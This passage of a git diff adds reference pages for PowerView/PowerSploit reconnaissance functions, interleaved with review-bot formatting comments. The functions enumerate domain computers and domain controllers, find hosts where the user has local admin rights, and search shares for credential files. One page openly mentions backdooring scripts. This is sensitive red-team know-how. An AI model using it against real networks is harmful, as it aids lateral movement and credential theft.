+Accept wildcard characters: False
+```
+
+### -ExcludeFolders
+Switch.
+Exclude folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludeHidden
+Switch.
+Exclude hidden files and folders from the search results.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckWriteAccess
+Switch.
+Only returns files the current user has write access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+to connect to remote systems for file enumeration.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
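Review bot: the DESCRIPTION's list of default keywords ("pass, sensitive, secret, admin, login and unattend*.xml") does not match the -Include default shown further down, "@('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')"; update the prose to the actual default so readers know *.vmdk, *creds*, *credential* and *.config files are also returned. EXAMPLE 3 has the same broken fence as the other files in this diff: only the ConvertTo-SecureString line is fenced, and "$Cred = New-Object ..." and "Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\"" fall outside it, so the escaped backslashes will render as prose rather than as the literal UNC path.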
diff --git a/docs/Recon/Find-LocalAdminAccess.md b/docs/Recon/Find-LocalAdminAccess.md new file mode 100755 index 0000000..f3e3b6f --- /dev/null +++ b/docs/Recon/Find-LocalAdminAccess.md @@ -0,0 +1,337 @@ +# Find-LocalAdminAccess
+
+## SYNOPSIS
+Finds machines on the local domain where the current user has local administrator access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Test-AdminAccess, New-ThreadedFunction
+
+## SYNTAX
+
+```
+Find-LocalAdminAccess [[-ComputerName] <String[]>] [-ComputerDomain <String>] [-ComputerLDAPFilter <String>]
+ [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>] [-ComputerServicePack <String>]
+ [-ComputerSiteName <String>] [-CheckShareAccess] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and for each computer it checks if the current user
+has local administrator access using Test-AdminAccess.
+If -Credential is passed,
+then Invoke-UserImpersonation is used to impersonate the specified user
+before enumeration, reverting after with Invoke-RevertToSelf.
+
+Idea adapted from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-LocalAdminAccess
+```
+
+Finds machines in the current domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-LocalAdminAccess -Domain dev.testlab.local
+```
+
+Finds machines in the dev.testlab.local domain the current user has admin access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-LocalAdminAccess -Domain testlab.local -Credential $Cred
+
+Finds machines in the testlab.local domain that the user with the specified -Credential
+has admin access to.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckShareAccess
+Switch.
+Only display found shares that the local user has access to.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+Computer dnshostnames the current user has administrative access to.
+
+## NOTES
+
+## RELATED LINKS
+
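Review bot: EXAMPLE 2 and EXAMPLE 3 pass -Domain ("Find-LocalAdminAccess -Domain dev.testlab.local" and "Find-LocalAdminAccess -Domain testlab.local -Credential $Cred"), but the SYNTAX block declares no -Domain parameter; the computer domain is selected with -ComputerDomain, so either the examples or the parameter list is wrong. The -CheckShareAccess description ("Only display found shares that the local user has access to") does not describe anything this function emits, since OUTPUTS is "Computer dnshostnames the current user has administrative access to"; explain what the switch does in this function or remove it from the parameter set. -Threads again reads "for user searching" where the work being parallelised is the Test-AdminAccess check per host.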
diff --git a/docs/Recon/Get-ComputerDetails.md b/docs/Recon/Get-ComputerDetails.md new file mode 100755 index 0000000..6bc3e91 --- /dev/null +++ b/docs/Recon/Get-ComputerDetails.md @@ -0,0 +1,68 @@ +# Get-ComputerDetails
+
+## SYNOPSIS
+This script is used to get useful information from a computer.
+
+Function: Get-ComputerDetails
+Author: Joe Bialek, Twitter: @JosephBialek
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-ComputerDetails [-ToString]
+```
+
+## DESCRIPTION
+This script is used to get useful information from a computer.
+Currently, the script gets the following information:
+-Explicit Credential Logons (Event ID 4648)
+-Logon events (Event ID 4624)
+-AppLocker logs to find what processes are created
+-PowerShell logs to find PowerShell scripts which have been executed
+-RDP Client Saved Servers, which indicates what servers the user typically RDP's in to
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ComputerDetails
+```
+
+Gets information about the computer and outputs it as PowerShell objects.
+
+Get-ComputerDetails -ToString
+Gets information about the computer and outputs it as raw text.
+
+## PARAMETERS
+
+### -ToString
+Switch: Outputs the data as text instead of objects, good if you are using this script through a backdoor.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+This script is useful for fingerprinting a server to see who connects to this server (from where), and where users on this server connect to.
+You can also use it to find Powershell scripts and executables which are typically run, and then use this to backdoor those files.
+
+## RELATED LINKS
+
+[Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/
+Github repo: https://github.com/clymb3r/PowerShell)
+
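Review bot: the RELATED LINKS entry is a malformed markdown link: "[Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell](Blog: http://clymb3r.wordpress.com/ Github repo: https://github.com/clymb3r/PowerShell)" uses the entire text, newline included, as the link target, so it will not render as a link. Split it into two entries, "[Blog](http://clymb3r.wordpress.com/)" and "[Github repo](https://github.com/clymb3r/PowerShell)". Also, the second usage under EXAMPLE 1, "Get-ComputerDetails -ToString", has neither its own example heading nor a code fence, so it reads as a continuation of the prose rather than as a second example.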
diff --git a/docs/Recon/Get-Domain.md b/docs/Recon/Get-Domain.md new file mode 100755 index 0000000..aa8098c --- /dev/null +++ b/docs/Recon/Get-Domain.md @@ -0,0 +1,81 @@ +# Get-Domain
+
+## SYNOPSIS
+Returns the domain object for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-Domain [[-Domain] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Domain object for the current
+domain or the domain specified with -Domain X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Domain -Domain testlab.local
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Domain -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain name to query for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+A complex .NET domain object.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG](http://social.technet.microsoft.com/Forums/scriptcenter/en-US/0c5b3f83-e528-4d49-92a4-dee31f4b481c/finding-the-dn-of-the-the-domain-without-admodule-in-powershell?forum=ITCG)
+
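Review bot: in EXAMPLE 2 the code fence closes after the first line, leaving `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and `Get-Domain -Credential $Cred` outside the fence as prose; move all three lines into one fence and add a one-line description of what the example shows (EXAMPLE 1 has no description either). The INPUTS section is also empty although -Domain is documented as `Accept pipeline input: True (ByValue)`; document the String pipeline input there so the two sections agree.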
diff --git a/docs/Recon/Get-DomainComputer.md b/docs/Recon/Get-DomainComputer.md new file mode 100755 index 0000000..562f769 --- /dev/null +++ b/docs/Recon/Get-DomainComputer.md @@ -0,0 +1,426 @@ +# Get-DomainComputer
+
+## SYNOPSIS
+Return all computers or specific computer objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainComputer [[-Identity] <String[]>] [-Unconstrained] [-TrustedToAuth] [-Printers] [-SPN <String>]
+ [-OperatingSystem <String>] [-ServicePack <String>] [-SiteName <String>] [-Ping] [-Domain <String>]
+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]
+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]
+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all computer objects for
+the current domain are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainComputer
+```
+
+Returns the current computers in current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer -SPN mssql* -Domain testlab.local
+```
+
+Returns all MS SQL servers in the testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -Unconstrained
+```
+
+Search the specified OU for computeres that allow unconstrained delegation.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainComputer -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+WINDOWS10$), DistinguishedName (e.g.
+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.
+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),
+or a dns host name (e.g.
+windows10.testlab.local).
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: SamAccountName, Name, DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Unconstrained
+Switch.
+Return computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -TrustedToAuth
+Switch.
+Return computer objects that are trusted to authenticate for other principals.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Printers
+Switch.
+Return only printers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SPN
+Return computers with a specific service principal name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePrincipalName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OperatingSystem
+Return computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServicePack
+Return computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SiteName
+Return computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Ping
+Switch.
+Ping each host to ensure it's up before enumerating.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Custom PSObject with translated computer property fields.
+
+PowerView.Computer.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
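Review bot: the -Identity, -SPN, -OperatingSystem, -ServicePack and -SiteName descriptions each say "wildcards accepted" while every one of their yaml blocks states `Accept wildcard characters: False`; one of the two is wrong and they should be reconciled, since the generated metadata is what readers of the rendered page will trust. The same kind of mismatch appears for -ServerTimeLimit, whose text says "Default of 120 seconds" while the block says `Default value: 0`. Smaller points in the same hunk: `properies` (DESCRIPTION) and `computeres` (EXAMPLE 3) are typos; EXAMPLE 4's fence closes after the `$SecPassword = ...` line, leaving the `$Cred = ...` and `Get-DomainComputer -Credential $Cred` lines outside it; and `PowerView.Computer.Raw` in OUTPUTS should be a `###` heading like the `### PowerView.Computer` entry above it, otherwise it reads as part of that entry's description.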
diff --git a/docs/Recon/Get-DomainController.md b/docs/Recon/Get-DomainController.md new file mode 100755 index 0000000..3d15f5c --- /dev/null +++ b/docs/Recon/Get-DomainController.md @@ -0,0 +1,132 @@ +# Get-DomainController
+
+## SYNOPSIS
+Return the domain controllers for the current (or specified) domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-Domain
+
+## SYNTAX
+
+```
+Get-DomainController [[-Domain] <String>] [-Server <String>] [-LDAP] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Enumerates the domain controllers for the current or specified domain.
+By default built in .NET methods are used.
+The -LDAP switch uses Get-DomainComputer
+to search for domain controllers.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainController -Domain 'test.local'
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController -Domain 'test.local' -LDAP
+```
+
+Determine the domain controllers for 'test.local' using LDAP queries.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+'test.local' | Get-DomainController
+```
+
+Determine the domain controllers for 'test.local'.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainController -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+The domain to query for domain controllers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAP
+Switch.
+Use LDAP queries to determine the domain controllers instead of built in .NET methods.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.Computer
+
+Outputs custom PSObjects with details about the enumerated domain controller if -LDAP is specified.
+
+System.DirectoryServices.ActiveDirectory.DomainController
+
+If -LDAP isn't specified.
+
+## NOTES
+
+## RELATED LINKS
+
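Review bot: in OUTPUTS the second type, `System.DirectoryServices.ActiveDirectory.DomainController`, is plain text under the `### PowerView.Computer` heading, so it reads as a continuation of that entry's description; make it its own `###` heading with "If -LDAP isn't specified." beneath it. EXAMPLE 4 has the same fence problem as the other files in this commit: only the `$SecPassword = ...` line is fenced and the `$Cred = ...` and `Get-DomainController -Credential $Cred` lines fall outside as prose. EXAMPLE 1 and EXAMPLE 3 also carry the identical description "Determine the domain controllers for 'test.local'."; the third should say that it takes the domain name from the pipeline, which is the point of that example.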
diff --git a/docs/Recon/Get-DomainDFSShare.md b/docs/Recon/Get-DomainDFSShare.md new file mode 100755 index 0000000..ce33275 --- /dev/null +++ b/docs/Recon/Get-DomainDFSShare.md @@ -0,0 +1,202 @@ +# Get-DomainDFSShare
+
+## SYNOPSIS
+Returns a list of all fault-tolerant distributed file systems
+for the current (or specified) domain.
+
+Author: Ben Campbell (@meatballs__)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainDFSShare [[-Domain] <String[]>] [[-SearchBase] <String>] [[-Server] <String>]
+ [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>] [-Tombstone]
+ [[-Credential] <PSCredential>] [[-Version] <String>]
+```
+
+## DESCRIPTION
+This function searches for all distributed file systems (either version
+1, 2, or both depending on -Version X) by searching for domain objects
+matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
+The server data is parsed appropriately and returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDFSShare
+```
+
+Returns all distributed file system shares for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDFSShare -Domain testlab.local
+```
+
+Returns all distributed file system shares for the 'testlab.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainDFSShare -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
